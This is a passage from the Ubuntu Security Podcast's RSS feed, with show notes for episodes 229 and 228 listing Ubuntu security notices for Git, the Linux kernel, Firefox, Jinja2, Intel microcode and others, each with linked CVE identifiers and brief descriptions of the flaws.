and discarding operations if they take longer than this to avoid the ability
to &ldquo;store up&rdquo; responses to be released at a later time</li>
</ul>
<h3 id="usn-6793-1-git-vulnerabilities--09-31">[<a href="https://ubuntu.com/security/notices/USN-6793-1">USN-6793-1</a>] Git vulnerabilities (09:31)</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-32465">CVE-2024-32465</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-32021">CVE-2024-32021</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-32020">CVE-2024-32020</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-32004">CVE-2024-32004</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-32002">CVE-2024-32002</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6792-1-flask-security-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6792-1">USN-6792-1</a>] Flask-Security vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-23385">CVE-2021-23385</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6794-1-frr-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6794-1">USN-6794-1</a>] FRR vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-34088">CVE-2024-34088</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-31951">CVE-2024-31951</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-31950">CVE-2024-31950</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-31948">CVE-2024-31948</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6777-4-linux-kernel--hwe--vulnerabilities--09-40">[<a href="https://ubuntu.com/security/notices/USN-6777-4">USN-6777-4</a>] Linux kernel (HWE) vulnerabilities (09:40)</h3>
<ul>
<li>17 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52583">CVE-2023-52583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26801">CVE-2024-26801</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26805">CVE-2024-26805</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26735">CVE-2024-26735</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26622">CVE-2024-26622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46981">CVE-2021-46981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52566">CVE-2023-52566</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52604">CVE-2023-52604</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26704">CVE-2024-26704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26614">CVE-2024-26614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52602">CVE-2023-52602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26635">CVE-2024-26635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52439">CVE-2023-52439</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52601">CVE-2023-52601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52530">CVE-2023-52530</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52524">CVE-2023-52524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-47233">CVE-2023-47233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-228/#usn-6777-1-linux-kernel-vulnerabilities">[USN-6777-1] Linux kernel vulnerabilities from Episode 228</a></li>
<li>AWS HWE kernel (4.15)</li>
</ul>
<h3 id="usn-6795-1-linux-kernel--intel-iotg--vulnerabilities--10-00">[<a href="https://ubuntu.com/security/notices/USN-6795-1">USN-6795-1</a>] Linux kernel (Intel IoTG) vulnerabilities (10:00)</h3>
<ul>
<li>95 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-52588">CVE-2023-52588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52622">CVE-2023-52622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26920">CVE-2024-26920</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52607">CVE-2023-52607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52530">CVE-2023-52530</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52435">CVE-2023-52435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52615">CVE-2023-52615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26684">CVE-2024-26684</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26829">CVE-2024-26829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26614">CVE-2024-26614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52489">CVE-2023-52489</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52642">CVE-2023-52642</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52583">CVE-2023-52583</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26696">CVE-2024-26696</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26627">CVE-2024-26627</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26636">CVE-2024-26636</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26663">CVE-2024-26663</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26702">CVE-2024-26702</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26685">CVE-2024-26685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26715">CVE-2024-26715</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26668">CVE-2024-26668</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52492">CVE-2023-52492</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52498">CVE-2023-52498</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26825">CVE-2024-26825</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52587">CVE-2023-52587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26615">CVE-2024-26615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52608">CVE-2023-52608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26660">CVE-2024-26660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52601">CVE-2023-52601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26910">CVE-2024-26910</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26676">CVE-2024-26676</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52493">CVE-2023-52493</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26673">CVE-2024-26673</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26707">CVE-2024-26707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26698">CVE-2024-26698</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26641">CVE-2024-26641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52494">CVE-2023-52494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52595">CVE-2023-52595</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26697">CVE-2024-26697</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52617">CVE-2023-52617</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26675">CVE-2024-26675</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26610">CVE-2024-26610</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26606">CVE-2024-26606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52614">CVE-2023-52614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26712">CVE-2024-26712</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52635">CVE-2023-52635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26689">CVE-2024-26689</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26916">CVE-2024-26916</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26665">CVE-2024-26665</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52623">CVE-2023-52623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26635">CVE-2024-26635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26602">CVE-2024-26602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52597">CVE-2023-52597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52619">CVE-2023-52619</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26808">CVE-2024-26808</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26600">CVE-2024-26600</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26826">CVE-2024-26826</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26644">CVE-2024-26644</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26695">CVE-2024-26695</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52604">CVE-2023-52604</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26625">CVE-2024-26625</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52618">CVE-2023-52618</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26664">CVE-2024-26664</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26593">CVE-2024-26593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52633">CVE-2023-52633</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52606">CVE-2023-52606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26640">CVE-2024-26640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52486">CVE-2023-52486</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52631">CVE-2023-52631</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26720">CVE-2024-26720</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52599">CVE-2023-52599</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26671">CVE-2024-26671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26722">CVE-2024-26722</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52602">CVE-2023-52602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26645">CVE-2024-26645</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52637">CVE-2023-52637</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26704">CVE-2024-26704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52638">CVE-2023-52638</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26717">CVE-2024-26717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26592">CVE-2024-26592</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52491">CVE-2023-52491</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52627">CVE-2023-52627</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52598">CVE-2023-52598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26594">CVE-2024-26594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52643">CVE-2023-52643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26622">CVE-2024-26622</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52594">CVE-2023-52594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26608">CVE-2024-26608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26679">CVE-2024-26679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52616">CVE-2023-52616</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23849">CVE-2024-23849</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-2201">CVE-2024-2201</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0001">CVE-2022-0001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-1151">CVE-2024-1151</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-47233">CVE-2023-47233</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Very similar to <a href="/episode-228/#usn-6766-2-linux-kernel-vulnerabilities--01-07">[USN-6766-2] Linux kernel vulnerabilities from Episode 228</a></li>
<li>5.15 Intel IOTG - optimisations for various Intel IOT platforms like NUCs and
Atom-based devices - low power x86</li>
</ul>
<h3 id="usn-6779-2-firefox-regressions--10-30">[<a href="https://ubuntu.com/security/notices/USN-6779-2">USN-6779-2</a>] Firefox regressions (10:30)</h3>
<ul>
<li>14 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-4770">CVE-2024-4770</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4367">CVE-2024-4367</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4764">CVE-2024-4764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4778">CVE-2024-4778</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4777">CVE-2024-4777</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4776">CVE-2024-4776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4775">CVE-2024-4775</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4774">CVE-2024-4774</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4773">CVE-2024-4773</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4772">CVE-2024-4772</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4771">CVE-2024-4771</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4769">CVE-2024-4769</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4768">CVE-2024-4768</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-4767">CVE-2024-4767</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>126.0.1 - drag-and-drop was broken in 126.0</li>
</ul>
<h3 id="usn-6787-1-jinja2-vulnerability--10-48">[<a href="https://ubuntu.com/security/notices/USN-6787-1">USN-6787-1</a>] Jinja2 vulnerability (10:48)</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-34064">CVE-2024-34064</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Incorrect handling of various HTML attributes - attacker could then possibly
inject arbitrary HTML attrs/values and hence inject JS code to peform XSS
attacks etc</li>
</ul>
<h3 id="usn-6797-1-intel-microcode-vulnerabilities--11-22">[<a href="https://ubuntu.com/security/notices/USN-6797-1">USN-6797-1</a>] Intel Microcode vulnerabilities (11:22)</h3>
<ul>
<li>9 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-46103">CVE-2023-46103</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-47855">CVE-2023-47855</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45745">CVE-2023-45745</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-45733">CVE-2023-45733</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-43490">CVE-2023-43490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39368">CVE-2023-39368</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38575">CVE-2023-38575</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28746">CVE-2023-28746</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22655">CVE-2023-22655</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Latest release from upstream - mitigates against various hardware vulns
<ul>
<li>A couple issues in SGX/TDX on different Intel Xeon processors:
<ul>
<li>Invalid restrictions -&gt; local root -&gt; super-privesc</li>
<li>Invalid input on TDX -&gt; local root -&gt; super-privesc</li>
<li>Invalid SGX base key calculation -&gt; info leak</li>
</ul>
</li>
<li>Transient execution attacks to read privileged information</li>
<li>DoS through bus lock mishandling or through invalid instruction sequences</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E229.mp3" length="13102934" type="audio/mpeg" /><itunes:duration>802</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 228
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-228/</link>
          <pubDate>Fri, 24 May 2024 13:24:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>7fe897927383d15499ef2e7e3c08e8792d6b24459e32554ad9a31465d043a8812e5a1843d57b9d5aaf84360fda39421b224e4953b6524c92d553fc8c1ee58afc</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 228</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          The team is back from Madrid and this week we bring you some of our plans for
  the upcoming Ubuntu 24.10 release, plus we talk about Google's kernelCTF project
  and Mozilla's PDF.js sandbox when covering security updates for the Linux...
        
        ]]></itunes:subtitle>
        <itunes:summary>  The team is back from Madrid and this week we bring you some of our plans for
  the upcoming Ubuntu 24.10 release, plus we talk about Google's kernelCTF project
  and Mozilla's PDF.js sandbox when covering security updates for the Linux
  kernel, Firefox, Spreadsheet::ParseExcel, idna and more.
  </itunes:summary>
        <description>  The team is back from Madrid and this week we bring you some of our plans for
  the upcoming Ubuntu 24.10 release, plus we talk about Google's kernelCTF project
  and Mozilla's PDF.js sandbox when covering security updates for the Linux
  kernel, Firefox, Spreadsheet::ParseExcel, idna and more.
  </description>
        <googleplay:description>  The team is back from Madrid and this week we bring you some of our plans for
  the upcoming Ubuntu 24.10 release, plus we talk about Google's kernelCTF project
  and Mozilla's PDF.js sandbox when covering security updates for the Linux
  kernel, Firefox, Spreadsheet::ParseExcel, idna and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>The team is back from Madrid and this week we bring you some of our plans for
the upcoming Ubuntu 24.10 release, plus we talk about Google&rsquo;s kernelCTF project
and Mozilla&rsquo;s PDF.js sandbox when covering security updates for the Linux
kernel, Firefox, Spreadsheet::ParseExcel, idna and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>121 unique CVEs addressed</p>
<h3 id="usn-6766-2-linux-kernel-vulnerabilities--01-07">[<a href="https://ubuntu.com/security/notices/USN-6766-2">USN-6766-2</a>] Linux kernel vulnerabilities (01:07)</h3>
<ul>
<li>92 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-26697">CVE-2024-26697</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52489">CVE-2023-52489</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26644">CVE-2024-26644</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26702">CVE-2024-26702</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52492">CVE-2023-52492</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52616">CVE-2023-52616</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26808">CVE-2024-26808</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26920">CVE-2024-26920</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52494">CVE-2023-52494</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26698">CVE-2024-26698</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26695">CVE-2024-26695</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52635">CVE-2023-52635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26707">CVE-2024-26707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26715">CVE-2024-26715</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52597">CVE-2023-52597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52435">CVE-2023-52435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26668">CVE-2024-26668</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52598">CVE-2023-52598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26593">CVE-2024-26593</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52643">CVE-2023-52643</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26717">CVE-2024-26717</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52604">CVE-2023-52604</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26602">CVE-2024-26602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26664">CVE-2024-26664</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52491">CVE-2023-52491</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26635">CVE-2024-26635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26640">CVE-2024-26640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26696">CVE-2024-26696</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26627">CVE-2024-26627</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52623">CVE-2023-52623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26641">CVE-2024-26641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26829">CVE-2024-26829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26679">CVE-2024-26679</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26600">CVE-2024-26600</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26916">CVE-2024-26916</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26606">CVE-2024-26606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52614">CVE-2023-52614</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26675">CVE-2024-26675</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26712">CVE-2024-26712</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52587">CVE-2023-52587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52642">CVE-2023-52642</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26636">CVE-2024-26636</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52615">CVE-2023-52615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26615">CVE-2024-26615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26722">CVE-2024-26722</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52608">CVE-2023-52608</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52607">CVE-2023-52607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52631">CVE-2023-52631</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52486">CVE-2023-52486</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26645">CVE-2024-26645</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52617">CVE-2023-52617</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-26660">CVE-2024-26660</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-52595">CVE-2023-52595</a> <!-- raw HTML omitted --></li>
